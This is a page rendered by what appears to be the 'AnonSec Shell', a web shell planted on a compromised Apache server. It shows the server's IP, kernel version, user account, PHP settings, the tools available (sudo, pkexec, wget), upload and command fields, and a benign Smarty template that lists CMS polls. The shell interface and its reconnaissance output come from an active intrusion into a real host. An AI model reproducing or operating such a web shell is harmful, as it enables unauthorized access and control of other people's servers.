AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/leo/application/plugins/module_cms/views/poll/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/leo/application/plugins/module_cms/views/poll/listPolls.tpl
<div class="panel panel-default">
    <div class="panel-body">
        <a href="{$_url}module_cms/poll/add/" class="md-btn md-btn-primary"><i class="fa fa-plus"></i> {$_L['CMS_New_Poll']}</a>
    </div>
    <div class="panel-body">
        <table class="table table-bordered table-hover sys_table footable"  data-filter="#foo_filter" data-page-size="50">
            <thead>
            <tr>
                <th>#</th>
                <th>{$_L['CMS_Article_Title']}</th>
                <th>{$_L['Status']}</th>
                <th>{$_L['Action']}</th>
            </tr>
            </thead>
            <tbody>
            {foreach $polls as $poll}
                <tr>
                    <td>{$poll->id}</td>
                    <td>{$poll->title}</td>
                    <td>
                        {if ($poll->status)}
                            {$status = $_L['Status_Active']}
                            {$class = 'badge-green'}
                        {else}
                            {$status = $_L['Status_Inactive']}
                            {$class = 'badge-default'}
                        {/if}
                        <span class="badge {$class}">
                            {$status}
                        </span>
                    </td>
                    <td class="project-actions col-xs-3">
                        <a href="{$_url}module_cms/poll/edit/{$poll->id}" class="btn btn-xs btn-warning" data-toggle="tooltip" title="{$_L['Edit']}"><i class="fa fa-pencil"></i> {$_L['Edit']} </a>
                        <a href="#" onclick="ConfirmDelete({$poll->id})" class="btn btn-xs btn-danger" id="c{$poll->id}" data-toggle="tooltip" title="{$_L['Delete']}"><i class="fa fa-trash"></i> {$_L['Delete']} </a>
                        <form action="{$_url}module_cms/poll/delete" method="post" id="formdelete"></form>
                    </td>
                </tr>
            {/foreach}
            </tbody>
        </table>
    </div>
</div>

Anon7 - 2022
AnonSec Team